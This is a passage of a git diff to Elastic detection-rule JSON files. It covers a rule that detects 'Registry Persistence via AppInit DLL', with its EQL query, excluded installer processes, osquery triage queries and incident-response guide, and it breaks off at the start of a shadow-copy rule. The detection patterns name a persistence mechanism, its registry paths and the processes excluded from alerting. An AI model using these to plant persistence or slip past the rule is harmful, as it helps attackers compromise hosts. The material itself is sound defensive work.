!{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Registry Persistence via AppInit DLL\n\nAppInit DLLs are dynamic-link libraries (DLLs) that are loaded into every process that creates a user interface (loads `user32.dll`) on Microsoft Windows operating systems. The AppInit DLL mechanism is used to load custom code into user-mode processes, allowing for the customization of the user interface and the behavior of Windows-based applications.\n\nAttackers who add those DLLs to the registry locations can execute code with elevated privileges, similar to process injection, and provide a solid and constant persistence on the machine.\n\nThis rule identifies modifications on the AppInit registry keys.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review the source process and related DLL file tied to the Windows Registry entry.\n - Check whether the DLL is signed, and tied to a authorized program used on your environment.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Retrieve all DLLs under the AppInit registry keys:\n - !{osquery{\"label\":\"Osquery - Retrieve AppInit Registry Value\",\"query\":\"SELECT * FROM registry r where (r.key == 'HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows' or\\nr.key == 'HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows') and r.name ==\\n'AppInit_DLLs'\\n\"}}\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable and the DLLs using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "registry where host.os.type == \"windows\" and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\",\n \"HKLM\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\"\n ) and not process.executable : (\n \"C:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\",\n \"C:\\\\Program Files\\\\Commvault\\\\ContentStore*\\\\Base\\\\cvd.exe\",\n \"C:\\\\Program Files (x86)\\\\Commvault\\\\ContentStore*\\\\Base\\\\cvd.exe\")\n", "related_integrations": [ { @@ -45,7 +45,7 @@ ], "risk_score": 47, "rule_id": "d0e159cf-73e9-40d1-a9ed-077e3158a855", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/d0e159cf-73e9-40d1-a9ed-077e3158a855_106.json b/packages/security_detection_engine/kibana/security_rule/d0e159cf-73e9-40d1-a9ed-077e3158a855_106.json index 2904ac318de..e5781199b3a 100644 --- a/packages/security_detection_engine/kibana/security_rule/d0e159cf-73e9-40d1-a9ed-077e3158a855_106.json +++ b/packages/security_detection_engine/kibana/security_rule/d0e159cf-73e9-40d1-a9ed-077e3158a855_106.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Registry Persistence via AppInit DLL", - "note": "## Triage and analysis\n\n### Investigating Registry Persistence via AppInit DLL\n\nAppInit DLLs are dynamic-link libraries (DLLs) that are loaded into every process that creates a user interface (loads `user32.dll`) on Microsoft Windows operating systems. The AppInit DLL mechanism is used to load custom code into user-mode processes, allowing for the customization of the user interface and the behavior of Windows-based applications.\n\nAttackers who add those DLLs to the registry locations can execute code with elevated privileges, similar to process injection, and provide a solid and constant persistence on the machine.\n\nThis rule identifies modifications on the AppInit registry keys.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review the source process and related DLL file tied to the Windows Registry entry.\n - Check whether the DLL is signed, and tied to a authorized program used on your environment.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Retrieve all DLLs under the AppInit registry keys:\n - !{osquery{\"label\":\"Osquery - Retrieve AppInit Registry Value\",\"query\":\"SELECT * FROM registry r where (r.key == 'HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows' or\\nr.key == 'HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows') and r.name ==\\n'AppInit_DLLs'\\n\"}}\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable and the DLLs using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Registry Persistence via AppInit DLL\n\nAppInit DLLs are dynamic-link libraries (DLLs) that are loaded into every process that creates a user interface (loads `user32.dll`) on Microsoft Windows operating systems. The AppInit DLL mechanism is used to load custom code into user-mode processes, allowing for the customization of the user interface and the behavior of Windows-based applications.\n\nAttackers who add those DLLs to the registry locations can execute code with elevated privileges, similar to process injection, and provide a solid and constant persistence on the machine.\n\nThis rule identifies modifications on the AppInit registry keys.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review the source process and related DLL file tied to the Windows Registry entry.\n - Check whether the DLL is signed, and tied to a authorized program used on your environment.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Retrieve all DLLs under the AppInit registry keys:\n - !{osquery{\"label\":\"Osquery - Retrieve AppInit Registry Value\",\"query\":\"SELECT * FROM registry r where (r.key == 'HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows' or\\nr.key == 'HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows') and r.name ==\\n'AppInit_DLLs'\\n\"}}\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable and the DLLs using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "registry where host.os.type == \"windows\" and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\",\n \"HKLM\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\"\n ) and not process.executable : (\n \"C:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\",\n \"C:\\\\Program Files\\\\Commvault\\\\ContentStore*\\\\Base\\\\cvd.exe\",\n \"C:\\\\Program Files (x86)\\\\Commvault\\\\ContentStore*\\\\Base\\\\cvd.exe\")\n", "related_integrations": [ { @@ -45,7 +45,7 @@ ], "risk_score": 47, "rule_id": "d0e159cf-73e9-40d1-a9ed-077e3158a855", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -81,7 +81,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/d0e159cf-73e9-40d1-a9ed-077e3158a855_107.json b/packages/security_detection_engine/kibana/security_rule/d0e159cf-73e9-40d1-a9ed-077e3158a855_107.json index c7495cacaae..850f42cbe37 100644 --- a/packages/security_detection_engine/kibana/security_rule/d0e159cf-73e9-40d1-a9ed-077e3158a855_107.json +++ b/packages/security_detection_engine/kibana/security_rule/d0e159cf-73e9-40d1-a9ed-077e3158a855_107.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Registry Persistence via AppInit DLL", - "note": "## Triage and analysis\n\n### Investigating Registry Persistence via AppInit DLL\n\nAppInit DLLs are dynamic-link libraries (DLLs) that are loaded into every process that creates a user interface (loads `user32.dll`) on Microsoft Windows operating systems. The AppInit DLL mechanism is used to load custom code into user-mode processes, allowing for the customization of the user interface and the behavior of Windows-based applications.\n\nAttackers who add those DLLs to the registry locations can execute code with elevated privileges, similar to process injection, and provide a solid and constant persistence on the machine.\n\nThis rule identifies modifications on the AppInit registry keys.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review the source process and related DLL file tied to the Windows Registry entry.\n - Check whether the DLL is signed, and tied to a authorized program used on your environment.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Retrieve all DLLs under the AppInit registry keys:\n - !{osquery{\"label\":\"Osquery - Retrieve AppInit Registry Value\",\"query\":\"SELECT * FROM registry r where (r.key == 'HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows' or\\nr.key == 'HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows') and r.name ==\\n'AppInit_DLLs'\\n\"}}\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable and the DLLs using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Registry Persistence via AppInit DLL\n\nAppInit DLLs are dynamic-link libraries (DLLs) that are loaded into every process that creates a user interface (loads `user32.dll`) on Microsoft Windows operating systems. The AppInit DLL mechanism is used to load custom code into user-mode processes, allowing for the customization of the user interface and the behavior of Windows-based applications.\n\nAttackers who add those DLLs to the registry locations can execute code with elevated privileges, similar to process injection, and provide a solid and constant persistence on the machine.\n\nThis rule identifies modifications on the AppInit registry keys.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review the source process and related DLL file tied to the Windows Registry entry.\n - Check whether the DLL is signed, and tied to a authorized program used on your environment.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Retrieve all DLLs under the AppInit registry keys:\n - !{osquery{\"label\":\"Osquery - Retrieve AppInit Registry Value\",\"query\":\"SELECT * FROM registry r where (r.key == 'HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows' or\\nr.key == 'HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows') and r.name ==\\n'AppInit_DLLs'\\n\"}}\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable and the DLLs using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "registry where host.os.type == \"windows\" and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\",\n \"HKLM\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\"\n ) and not process.executable : (\n \"C:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\",\n \"C:\\\\Program Files\\\\Commvault\\\\ContentStore*\\\\Base\\\\cvd.exe\",\n \"C:\\\\Program Files (x86)\\\\Commvault\\\\ContentStore*\\\\Base\\\\cvd.exe\")\n", "related_integrations": [ { @@ -45,7 +45,7 @@ ], "risk_score": 47, "rule_id": "d0e159cf-73e9-40d1-a9ed-077e3158a855", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -81,7 +81,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/d117cbb4-7d56-41b4-b999-bdf8c25648a0_104.json b/packages/security_detection_engine/kibana/security_rule/d117cbb4-7d56-41b4-b999-bdf8c25648a0_104.json index 52f681fd749..d807e345731 100644 --- a/packages/security_detection_engine/kibana/security_rule/d117cbb4-7d56-41b4-b999-bdf8c25648a0_104.json +++ b/packages/security_detection_engine/kibana/security_rule/d117cbb4-7d56-41b4-b999-bdf8c25648a0_104.json @@ -18,7 +18,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Symbolic Link to Shadow Copy Created", - "note": "## Triage and analysis\n\n### Investigating Symbolic Link to Shadow Copy Created\n\nShadow copies are backups or snapshots of an endpoint's files or volumes while they are in use. Adversaries may attempt to discover and create symbolic links to these shadow 